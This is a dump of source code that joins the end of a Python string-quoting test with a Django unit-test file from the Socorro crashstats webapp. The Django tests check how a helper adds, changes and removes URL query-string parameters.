#print "3:", repr(unquoted)
self.assertEquals(str, unquoted)
test_string("""test \nall kinds\n \n o\r
\\\\ nope\n\n"
""")
# The ones with 1+ backslashes directly followed by
# a newline or literal N can fail... we would need a
# state-machine parser to handle these, but this would
# be much slower so it's better to avoid them at the moment
self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
\\\\nope\n\n"
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Serg09/socorro | webapp-django/crashstats/base/tests/test_helpers.py | 11 | 1986 | from nose.tools import eq_
from django.test.client import RequestFactory
from crashstats.base.tests.testbase import TestCase
from crashstats.base.helpers import (
change_query_string
)
class TestChangeURL(TestCase):
def test_root_url_no_query_string(self):
context = {}
context['request'] = RequestFactory().get('/')
result = change_query_string(context)
eq_(result, '/')
def test_with_path_no_query_string(self):
context = {}
context['request'] = RequestFactory().get('/page/')
result = change_query_string(context)
eq_(result, '/page/')
def test_with_query_string(self):
context = {}
context['request'] = RequestFactory().get('/page/?foo=bar&bar=baz')
result = change_query_string(context)
eq_(result, '/page/?foo=bar&bar=baz')
def test_add_query_string(self):
context = {}
context['request'] = RequestFactory().get('/page/')
result = change_query_string(context, foo='bar')
eq_(result, '/page/?foo=bar')
def test_change_query_string(self):
context = {}
context['request'] = RequestFactory().get('/page/?foo=bar')
result = change_query_string(context, foo='else')
eq_(result, '/page/?foo=else')
def test_remove_query_string(self):
context = {}
context['request'] = RequestFactory().get('/page/?foo=bar')
result = change_query_string(context, foo=None)
eq_(result, '/page/')
def test_remove_leave_some(self):
context = {}
context['request'] = RequestFactory().get('/page/?foo=bar&other=thing')
result = change_query_string(context, foo=None)
eq_(result, '/page/?other=thing')
def test_change_query_without_base(self):
context = {}
context['request'] = RequestFactory().get('/page/?foo=bar')
result = change_query_string(context, foo='else', _no_base=True)
eq_(result, '?foo=else')
| mpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.